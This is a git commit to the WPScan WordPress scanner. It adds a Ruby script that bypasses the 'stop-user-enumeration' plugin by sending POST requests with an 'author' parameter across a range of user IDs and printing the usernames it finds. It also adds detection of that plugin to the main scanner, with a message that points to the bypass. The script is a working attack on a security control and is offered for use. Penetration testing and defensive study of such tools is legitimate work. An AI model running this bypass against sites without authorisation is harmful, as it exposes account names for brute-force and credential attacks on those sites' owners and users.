Fixes #456 - stop-user-enumeration detection & script for bypass

2014-04-16 15:09:41 +02:00
parent f77a27ecc3
commit 45f5f50262
2 changed files with 78 additions and 0 deletions
--- a/stop_user_enumeration_bypass.rb
+++ b/stop_user_enumeration_bypass.rb
@@ -0,0 +1,73 @@
+#!/usr/bin/env ruby
+# encoding: UTF-8
+#
+#
+# Script based on http://seclists.org/fulldisclosure/2014/Feb/3
+
+require File.join(File.dirname(__FILE__), 'lib/wpscan/wpscan_helper')
+
+@opts = {
+  ids: 1..10,
+  verbose: false,
+  user_agent: 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0) Gecko/20100101 Firefox/9.0'
+}
+
+parser = OptionParser.new('Usage: ./stop_user_enumeration_bypass.rb <Target URL> [options]', 35) do |opts|
+  opts.on('--proxy PROXY', 'Proxy to use') do |proxy|
+    @opts[:proxy] = proxy
+  end
+
+  opts.on('--auth Username:Password', 'Credentials to use if Basic/NTLM auth') do |creds|
+    @opts[:creds] = creds
+  end
+
+  opts.on('--ids START-END', 'The ids to check, default is 1-10') do |ids|
+    @opts[:ids] = Range.new(*ids.split('-').map(&:to_i))
+  end
+
+  opts.on('--user-agent UA', 'The user-agent to use') do |ua|
+    @opts[:user_agent] = ua
+  end
+
+  opts.on('--verbose', '-v', 'Verbose Mode') do
+    @opts[:verbose] = true
+  end
+end
+
+begin
+  parser.parse!
+
+  fail "#{red('The target URL must be supplied')}\n\n#{parser}" unless ARGV[0]
+
+  uri = URI.parse(add_trailing_slash(add_http_protocol(ARGV[0])))
+
+  request_params = {
+    proxy: @opts[:proxy],
+    userpwd: @opts[:creds],
+    headers: { 'User-Agent' => @opts[:user_agent] },
+    followlocation: true,
+    ssl_verifypeer: false,
+    ssl_verifyhost: 2
+  }
+
+  detected_users = WpUsers.new
+
+  @opts[:ids].each do |user_id|
+    user = WpUser.new(uri, id: user_id)
+
+    if user.exists_from_response?(Typhoeus.post(uri, request_params.merge(body: { author: user_id })))
+      detected_users << user
+    end
+  end
+
+  puts 'Usernames found:'
+  detected_users.output
+rescue => e
+  puts e.message
+
+  if @opts[:verbose]
+    puts red('Trace:')
+    puts red(e.backtrace.join("\n"))
+  end
+  exit(1)
+end
--- a/wpscan.rb
+++ b/wpscan.rb
@@ -296,6 +296,11 @@ def main
      puts
      puts "#{green('[+]')} Enumerating usernames ..."

+      if wp_target.has_plugin?('stop-user-enumeration')
+        puts "#{red('[!]')} Stop User Enumeration plugin detected, results might be empty. " \
+             "However a bypass exists, see stop_user_enumeration_bypass.rb in #{File.expand_path(File.dirname(__FILE__))}"
+      end
+
      wp_users = WpUsers.aggressive_detection(wp_target,
        enum_options.merge(
          range: wpscan_options.enumerate_usernames_range,